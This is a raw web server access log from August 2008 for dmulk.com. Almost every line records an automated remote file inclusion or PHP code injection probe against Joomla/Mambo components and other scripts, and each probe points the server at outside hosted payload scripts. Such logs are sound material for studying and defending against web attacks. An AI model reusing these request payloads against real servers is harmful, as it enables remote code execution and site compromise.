209.25.195.72 - - [12/Aug/2008:11:13:21 -0700] "GET /logs/index.php?abs_path=http://www.andrewbostom.org/components/com_galerry1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
209.25.195.72 - - [12/Aug/2008:11:13:22 -0700] "GET /index.php?abs_path=http://www.andrewbostom.org/components/com_galerry1?? HTTP/1.1" 200 18437 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:13:39 -0700] "GET /logs/access_080312.log//?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:13:41 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:13:43 -0700] "GET //?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 200 18359 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:13:44 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18559 "-" "libwww-perl/5.810" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:13:45 -0700] "GET /logs//?page=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 200 60288 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:13:45 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:13:45 -0700] "GET /logs/access_080404.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:13:46 -0700] "GET /logs/access_080404.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:13:51 -0700] "GET /logs/access_080229.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:13:54 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18537 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:13:55 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:13:56 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
222.237.78.125 - - [12/Aug/2008:11:13:58 -0700] "GET /logs/access_080215.log//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:13:59 -0700] "GET /logs/access_080227.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:13:59 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:14:00 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:14:00 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:14:02 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:14:04 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18559 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:14:04 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18559 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:14:05 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:14:07 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:14:10 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18571 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:14:11 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:14:25 -0700] "GET /logs/access_080116.log//content.php?seite=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:14:26 -0700] "GET //content.php?seite=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
151.1.210.219 - - [12/Aug/2008:11:14:27 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:14:27 -0700] "GET /logs//content.php?seite=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
151.1.210.219 - - [12/Aug/2008:11:14:27 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:14:35 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:14:37 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18555 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:14:37 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:14:41 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:15:22 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:16:02 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:16:03 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:16:07 -0700] "GET /logs/access_080404.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:16:08 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:16:12 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18549 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
151.1.210.219 - - [12/Aug/2008:11:16:24 -0700] "GET /logs/access_080213.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:16:27 -0700] "GET /logs/access_080404.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:16:28 -0700] "GET /logs/?sourcedir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 200 60283 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:16:30 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18571 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:11:16:31 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:11:16:31 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.geocities.com/jembutzmu/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:16:33 -0700] "GET /logs/access_080303.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.224.152.230 - - [12/Aug/2008:11:16:39 -0700] "GET /?sourcedir=http://m4ng4.110mb.com/dd.txt? HTTP/1.1" 200 18367 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:16:47 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:16:49 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18555 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:16:57 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:17:00 -0700] "GET /logs/access_080329.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.116.93.138 - - [12/Aug/2008:11:17:18 -0700] "GET /logs/access_080207.log///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://ugtcajamadrid.org/ips.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.211.37 - - [12/Aug/2008:11:17:30 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.37 - - [12/Aug/2008:11:17:31 -0700] "GET /minamijewelry/?M=D HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:17:42 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:17:45 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18557 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:17:46 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:17:47 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18571 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:17:52 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:17:55 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:17:56 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:17:56 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:17:56 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:17:57 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.70.83.4 - - [12/Aug/2008:11:18:08 -0700] "GET //index.php?loc=&cat=http://ugtcajamadrid.org/ips.tx? HTTP/1.1" 200 18395 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:18:11 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:18:13 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:18:34 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:18:36 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:18:43 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:18:44 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:18:48 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:18:50 -0700] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:18:50 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:11:18:54 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:18:57 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
66.187.101.14 - - [12/Aug/2008:11:19:07 -0700] "GET /logs/access_080118.log//components/com_minibb.php?absolute_path=http://soft-5.com/Picture80?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
204.202.22.173 - - [12/Aug/2008:11:19:13 -0700] "GET /logs/errors.php?error=http://www.bangin-bros.de/picturesolution_211/install/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.202.22.173 - - [12/Aug/2008:11:19:13 -0700] "GET /errors.php?error=http://www.bangin-bros.de/picturesolution_211/install/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:19:13 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:19:14 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.128.122.28 - - [12/Aug/2008:11:19:14 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://geocities.com/heru_scorpion/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:19:30 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:11:19:30 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.214.111.137 - - [12/Aug/2008:11:19:33 -0700] "GET //e404.php?DOCUMENT_ROOT=http://guerlissy.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.111.137 - - [12/Aug/2008:11:19:33 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://guerlissy.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:11:19:38 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:11:19:58 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:20:15 -0700] "GET /logs/access_080219.log/errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:20:15 -0700] "GET /errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:20:16 -0700] "GET /logs/errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:20:22 -0700] "GET /logs/access_080404.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:20:22 -0700] "GET /logs/access_080404.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:20:22 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:20:22 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:20:23 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:20:23 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.245.226.25 - - [12/Aug/2008:11:20:33 -0700] "GET /logs/access.log/errors.php?error=http://ugtcajamadrid.org/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:20:38 -0700] "GET /logs/access_071227.log//content/multithumb/multithumb?mosConfig_absolute_path=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.222.143.140 - - [12/Aug/2008:11:20:38 -0700] "GET /logs/access_071227.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:20:46 -0700] "GET /logs/access_080404.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:20:48 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 200 18565 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:20:48 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:11:20:52 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:20:53 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [12/Aug/2008:11:20:53 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
